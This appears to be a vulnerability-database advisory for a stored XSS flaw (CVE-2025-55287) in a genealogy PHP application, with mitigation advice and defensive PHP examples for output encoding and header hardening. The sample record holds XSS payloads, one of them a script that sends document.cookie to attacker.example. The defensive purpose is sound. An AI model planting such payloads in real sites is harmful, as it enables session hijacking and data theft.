CVE-2025-55287: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MGeurts genealogy
Genealogy is a family tree PHP application. Prior to 4.4.0, an authenticated stored Cross-Site Scripting (XSS) vulnerability was identified in the Genealogy application. Authenticated attackers could run arbitrary JavaScript in another user’s session, leading to session hijacking, data theft, and UI manipulation. This vulnerability is fixed in 4.4.0.
AI Analysis
Technical Summary
CVE-2025-55287 is a high-severity authenticated stored Cross-Site Scripting (XSS) vulnerability in the MGeurts genealogy PHP application, affecting every version prior to 4.4.0. The root cause is improper neutralization of user-supplied input during web page generation (CWE-79): a value that an authenticated user saves through the application is later written into an HTML page without context-appropriate encoding, so any script tag, event-handler attribute or script-scheme URL in that value becomes live markup in the browser of every other user who views it. Because the payload is persisted server-side, no crafted link is needed; a victim only has to open a page that renders the attacker's data. The injected script then runs with the victim's session and can read whatever that user can read, submit requests on their behalf and alter what the page shows, which is what the advisory summarises as session hijacking, data theft and UI manipulation. Exploitation requires an authenticated account that can create or edit content shown to others, plus user interaction on the victim's side (viewing the content). The CVSS 3.0 base score of 8.0 reflects high impact on confidentiality, integrity and availability, low attack complexity, and no privilege beyond an ordinary authenticated login. The advisory does not identify the specific field or template that acts as the injection sink, so operators should treat every user-editable field that is rendered to other users as in scope. The flaw is fixed in version 4.4.0; no exploitation in the wild has been reported, but any multi-user deployment on an earlier version is exposed to every account holder on it.
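The sink-and-fix pattern behind a CWE-79 finding of this kind, as an added illustration: the code below is not from the genealogy project, and since the advisory does not say which field or template is the vulnerable one, the record, the field names (`firstname`, `nickname`, `photo_url`) and the render and check functions are all hypothetical. It emits one constructed stored record through an unencoded sink and through a context-aware encoder, then checks both outputs by parsing them the way a browser would rather than by grepping for `<script`.

```php
<?php
// Added illustration, not code from the genealogy project: an unencoded
// HTML sink (CWE-79) beside its hardened form. The record, field names and
// function names are hypothetical; the advisory does not name the real sink.
declare(strict_types=1);

// A person record as an authenticated attacker might have saved it
// (constructed sample data). Each field targets a different output context.
$storedPerson = [
    'firstname' => 'Jan<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'nickname'  => 'Jantje" onmouseover="alert(document.domain)',
    'photo_url' => 'javascript:alert(document.cookie)',
];

// VULNERABLE: stored values are concatenated straight into the page, so the
// script tag, the injected event handler and the javascript: URL all become
// live markup in every viewer's browser.
function renderPersonUnsafe(array $p): string
{
    return '<h1 title="' . $p['nickname'] . '">' . $p['firstname'] . '</h1>'
         . '<a href="' . $p['photo_url'] . '">photo</a>';
}

// Encoder for HTML text and quoted-attribute contexts. ENT_QUOTES encodes both
// quote characters, so a value can never terminate the attribute it sits in.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// URL context: entity encoding does not neutralise a javascript: scheme, so
// allow only http(s) and replace anything else with an inert fragment.
function safeUrl(string $url): string
{
    $u = trim($url);
    return preg_match('~^https?://~i', $u) === 1 ? e($u) : '#';
}

// HARDENED: every value is encoded for the context it lands in, and
// attributes are always quoted.
function renderPersonSafe(array $p): string
{
    return '<h1 title="' . e($p['nickname']) . '">' . e($p['firstname']) . '</h1>'
         . '<a href="' . safeUrl($p['photo_url']) . '">photo</a>';
}

// Count script elements, on* event-handler attributes and javascript: URLs in
// a fragment, parsing it as a browser would instead of grepping: an encoded
// "onmouseover=&quot;" inside element text is harmless and must not be flagged.
function countActiveContent(string $html): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $count = $doc->getElementsByTagName('script')->length;
    foreach ((new DOMXPath($doc))->query('//@*') as $attr) {
        $name  = strtolower($attr->nodeName);
        $value = strtolower(trim($attr->nodeValue));
        if (str_starts_with($name, 'on') || str_starts_with($value, 'javascript:')) {
            $count++;
        }
    }
    return $count;
}

$unsafe = renderPersonUnsafe($storedPerson);
$safe   = renderPersonSafe($storedPerson);

printf("unsafe render: %d active item(s)\n%s\n\n", countActiveContent($unsafe), $unsafe);
printf("hardened render: %d active item(s)\n%s\n", countActiveContent($safe), $safe);
```

The hardened output is safe because each value is encoded for the exact context it lands in (element text, a quoted attribute, a URL) and the attribute is always quoted; encoding for one context does not carry over to another, which is why the `javascript:` URL needs a scheme allowlist rather than `htmlspecialchars`. `countActiveContent()` doubles as an audit routine: run it over the HTML the application renders for each stored record, or over the stored fields themselves, to find payloads that are already in the database. The upstream project describes itself as a Laravel application; in Blade templates `{{ $value }}` applies the same `htmlspecialchars` encoding used here while `{!! $value !!}` emits raw HTML, so a code review for this bug class starts with every `{!! !!}` that carries user-supplied data.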
Potential Impact
For European organizations running the application, whether for genealogy research, family history services or cultural heritage collections, the primary concern is data protection. A family tree routinely holds personal data of living people (names, dates and places of birth, family relationships, often photographs and free-text notes), which is personal data under GDPR, and a script running in another user's session can exfiltrate everything that user is permitted to see. Session hijacking lets the attacker act as the victim, and if the victim is an administrator who views the poisoned content, a low-privilege contributor account becomes full control of the instance and its data. UI manipulation (spoofed forms, altered records) undermines trust in the data and can be used to harvest credentials. Where the application shares a domain, session mechanism or single sign-on with other systems, the impact extends beyond the genealogy platform itself. The authentication requirement restricts exposure to registered users, but on instances that allow self-registration or are shared among many contributors that is a weak barrier, and a compromised or reused password or an insider is sufficient.
Mitigation Recommendations
Upgrade the MGeurts genealogy application to version 4.4.0 or later; that is the only complete fix. Until the upgrade is applied, reduce both the chance of injection and the damage a successful injection can do:
- Limit who can create or edit content. Disable self-registration if it is enabled, remove dormant accounts and keep editing rights to trusted contributors; the attacker needs an authenticated account.
- Serve a Content-Security-Policy that forbids inline script (a per-response nonce or hash on script-src, no 'unsafe-inline'). Roll it out in Content-Security-Policy-Report-Only mode first, because the application's own inline scripts will need the nonce before the enforcing policy can be switched on.
- Set the session cookie with the HttpOnly, Secure and SameSite attributes so an injected script cannot read it through document.cookie. This blunts cookie theft but not requests the script makes with the victim's session, so it limits damage rather than fixing the flaw.
- Audit stored content for script tags, on* event-handler attributes and javascript: URLs, particularly in fields rendered on person and tree pages, and clean what is found. Repeat the audit after upgrading: the fix may correct output encoding rather than rewrite existing rows, so payloads saved earlier remain in the database.
- Enforce multi-factor authentication and alert on unusual logins, so a stolen or reused password is less likely to become the attacker's foothold.
- Place a web application firewall with XSS rule sets in front of the application as a secondary control only; signatures are bypassable and do not address the missing output encoding.
User awareness training has little value against this vulnerability: stored XSS fires when a victim merely views a page, with no link to click.
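The cookie and CSP hardening from the list above, as an added example rather than the project's own code or configuration: the weak header set is a constructed sample of what an unhardened PHP deployment typically sends, the cookie name is a placeholder, and the policy values and the `hardenedHeaders()`, `sendHardenedHeaders()` and `auditHeaders()` helpers are this example's own choices. Only the header names and cookie attributes are the standard ones.

```php
<?php
// Added example, not code or configuration from the genealogy project:
// the session-cookie attributes and Content-Security-Policy that limit what
// a stored XSS payload can do, beside an auditor that reports what is missing.
// Cookie name, policy values and helper names are this example's own choices.
declare(strict_types=1);

// Response headers as an unhardened deployment typically sends them
// (constructed sample): no CSP, session cookie without protective attributes.
const WEAK_HEADERS = [
    'Set-Cookie' => 'app_session=3f9c1d2a; path=/',
];

// Hardened header set. The nonce changes on every response and must be copied
// onto each <script> tag the application itself emits; an injected <script>
// or onmouseover= handler carries no nonce and is refused by the browser.
function hardenedHeaders(string $nonce): array
{
    return [
        'Set-Cookie' => 'app_session=3f9c1d2a; path=/; Secure; HttpOnly; SameSite=Lax',
        'Content-Security-Policy' =>
            "default-src 'self'; script-src 'nonce-{$nonce}' 'strict-dynamic'; "
            . "object-src 'none'; base-uri 'self'; frame-ancestors 'self'",
        'X-Content-Type-Options' => 'nosniff',
    ];
}

// Send the hardened headers on a live response (must run before any output)
// and hand the nonce back to the template layer.
function sendHardenedHeaders(): string
{
    $nonce = base64_encode(random_bytes(16));
    foreach (hardenedHeaders($nonce) as $name => $value) {
        header("{$name}: {$value}");
    }
    return $nonce;
}

// Report, for a header set, what an injected script could still do.
function auditHeaders(array $headers): array
{
    $findings = [];
    $cookie = strtolower($headers['Set-Cookie'] ?? '');
    if (!str_contains($cookie, 'httponly')) {
        $findings[] = 'session cookie readable via document.cookie: add HttpOnly';
    }
    if (!str_contains($cookie, 'samesite=')) {
        $findings[] = 'session cookie attached to cross-site requests: add SameSite=Lax or Strict';
    }
    if (!str_contains($cookie, 'secure')) {
        $findings[] = 'session cookie sent over plaintext HTTP: add Secure';
    }

    $csp = $headers['Content-Security-Policy'] ?? '';
    if ($csp === '') {
        $findings[] = 'no Content-Security-Policy: injected inline script runs unrestricted';
    } elseif (preg_match("~script-src[^;]*'unsafe-inline'~i", $csp) === 1
           || preg_match("~script-src[^;]*'(nonce-|sha(256|384|512)-)~i", $csp) !== 1) {
        $findings[] = "script-src permits inline script: use a per-response nonce or hash and drop 'unsafe-inline'";
    }
    return $findings;
}

foreach (auditHeaders(WEAK_HEADERS) as $finding) {
    echo "weak:     {$finding}\n";
}
$hardenedFindings = auditHeaders(hardenedHeaders(base64_encode(random_bytes(16))));
echo 'hardened: ' . (empty($hardenedFindings) ? 'no findings' : implode('; ', $hardenedFindings)) . "\n";
```

Two caveats apply when using this. HttpOnly stops `document.cookie` exfiltration but not requests the injected script sends with the victim's session, so it limits damage rather than fixing the bug. The CSP blocks the injected script only if every inline script the application itself emits carries the nonce; deploy it as `Content-Security-Policy-Report-Only` first and watch the reports before switching to the enforcing header. Neither measure replaces the 4.4.0 upgrade.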
Affected Countries
Germany, France, United Kingdom, Netherlands, Belgium, Italy, Spain, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-08-12T16:15:30.237Z
- CVSS Version: 3.0
- State: PUBLISHED
Threat ID: 68a35cb2ad5a09ad00b0b5e0
Added to database: 8/18/2025, 5:02:42 PM
Last enriched: 8/18/2025, 5:18:11 PM
Last updated: 8/19/2025, 12:34:27 AM
Related Threats
- CVE-2025-3495: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Delta Electronics COMMGR (Critical)
- CVE-2025-53948: CWE-415 Double Free in Santesoft Sante PACS Server (High)
- CVE-2025-52584: CWE-122 Heap-based Buffer Overflow in Ashlar-Vellum Cobalt (High)
- CVE-2025-46269: CWE-122 Heap-based Buffer Overflow in Ashlar-Vellum Cobalt (High)
- CVE-2025-54862: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Santesoft Sante PACS Server (Medium)